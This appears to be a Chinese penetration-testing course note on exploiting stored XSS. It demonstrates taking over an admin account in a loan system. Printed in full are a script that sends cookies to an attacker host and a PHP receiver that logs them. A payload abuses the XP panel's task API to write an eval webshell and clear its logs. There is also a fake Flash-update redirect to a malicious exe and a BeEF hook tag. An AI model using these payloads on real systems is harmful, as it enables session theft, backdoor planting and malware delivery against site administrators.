0%

第62天-XSS跨站&Cookie盗取&数据包提交&网络钓鱼&BEEF项目&XSS平台&危害利用

演示案例:

WEB攻防-XSS跨站-手工代码&在线平台&Beef工具

➢ WEB攻防-XSS跨站-Cookie盗取&数据提交&网络钓鱼

一、XSS跨站-攻击利用-凭据盗取

条件:无防护Cookie凭据获取

利用:XSS平台或手写接受代码

案例演示:某贷款分配系统存储XSS利用

这里就是xss注入点,我们在这里输入恶意的js代码就会发送到管理员后台的提现信息里,当管理员访问提现信息的时候就会触发

这就是管理员提现信息页面,我们输入的内容就会放在我标记的地方

接下来使用骑士财+蓝莲花进行xss盗取Cookie并登录管理员账号演示

利用蓝莲花生成payload


攻击账号提交payload

攻击者看提现记录触发xss

蓝莲花获取到管理员登录Cookie

换一个浏览器本身是没有管理员Cookie,替换成我们获取的Cookie后发现登录成功!

盗取Cookie两种方式

1、手工(了解盗取Cookie的原理)

1
2
3
4
5
6
7
8
9
<script>var url='http://xx.xx.xx.xx/getcookie.php?u='+window.location.href+'&c='+document.cookie;document.write("<img src="+url+" />");</script>
接收:
<?php
$url=$_GET['u'];
$cookie=$_GET['c'];
$fp =fopen('cookie.txt',"a");
fwrite($fp,$url."|".$cookie."\n");
fclose($fp);
?>

这段代码很简单就不解释了,不会就去ai吧

这里就不演示了,自己买一台云服务器然后把接受代码部署好,在漏洞点输入xss语句即可

2、平台:XSSReceiver(蓝莲花)

简单配置即可使用,无需数据库,无需其他组件支持

搭建:https://github.com/epoch99/BlueLotus_XSSReceiver-master

搭建好先访问install.php安装一下

二、XSS跨站-攻击利用-数据提交

条件:熟悉后台业务功能数据包,利用JS写一个模拟提交

利用:凭据获取不到或有防护无法利用凭据进入时执行其他

演示:小皮面板系统存储XSS提交数据包模拟写入后门文件

参考:blog.csdn.net/RestoreJustice/article/details/129735449

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
functionpoc(){
$.get('/service/app/tasks.php?type=task_list',{},function(data){
var id=data.data[0].ID;
$.post('/service/app/tasks.php?type=exec_task',{
tid:id
},function(res2){
$.post('/service/app/log.php?type=clearlog',{
},function(res3){},"json");
},"json");
},"json");
}
functionsave(){
var data=newObject();
data.task_id="";
data.title="test";
data.exec_cycle="1";
data.week="1";
data.day="3";
data.hour="14";
data.minute ="20";
data.shell='echo "<?php @eval($_POST[123]);?>" >C:/xp.cn/www/wwwroot/admin/localhost_80/wwwroot/1.php';
$.post('/service/app/tasks.php?type=save_shell',data,function(res){
poc();
},'json');
}
save();

把这段代码写到自己搭建的服务器里

利用小皮面板日志漏洞登录框输入,当管理员查看日志时触发,自动在网站目录下写入文件,后续使用webshell连接工具进行连接

三、XSS跨站-攻击利用-网络钓鱼

1、部署可访问的钓鱼页面并修改

2、植入XSS代码等待受害者触发

3、将后门及正常文件捆绑打包免杀

Ps:可在后续红队钓鱼篇章学习钓鱼页面制作

https://github.com/r00tSe7en/Fake-flash.cn

1.制作一个钓鱼页面,下载指向一个恶意文件

2.配合贷款那个xss漏洞写入

1
<script>alert('当前浏览器Flash版本过低,请下载升级!');location.href='http://x.x.x.x/flash.exe'</script>

管理员一看记录就会弹窗,安全意识低就回去下载,然后就被控了

四、XSS跨站-攻击利用-溯源综合

浏览器控制框架-beef-xss

这个我没有复现,这个和蓝莲花也是类似,就是触发xss以后我们能做更多的东西,比如获取Cookie,页面劫持等等。

只需执行JS文件,即可实现对当前浏览器的控制,可配合各类手法利用

演示:阿里云 Ubuntu 16.04x64(按量计费)HK香港服务器

apt update

apt install docker

apt install docker-compose

搭建:docker run –rm -p 3000:3000 janes/beef

访问:http://ip/ui/panel (账号密码:beef/beef)

1
利用:<script src="http://ip:3000/hook.js"></script>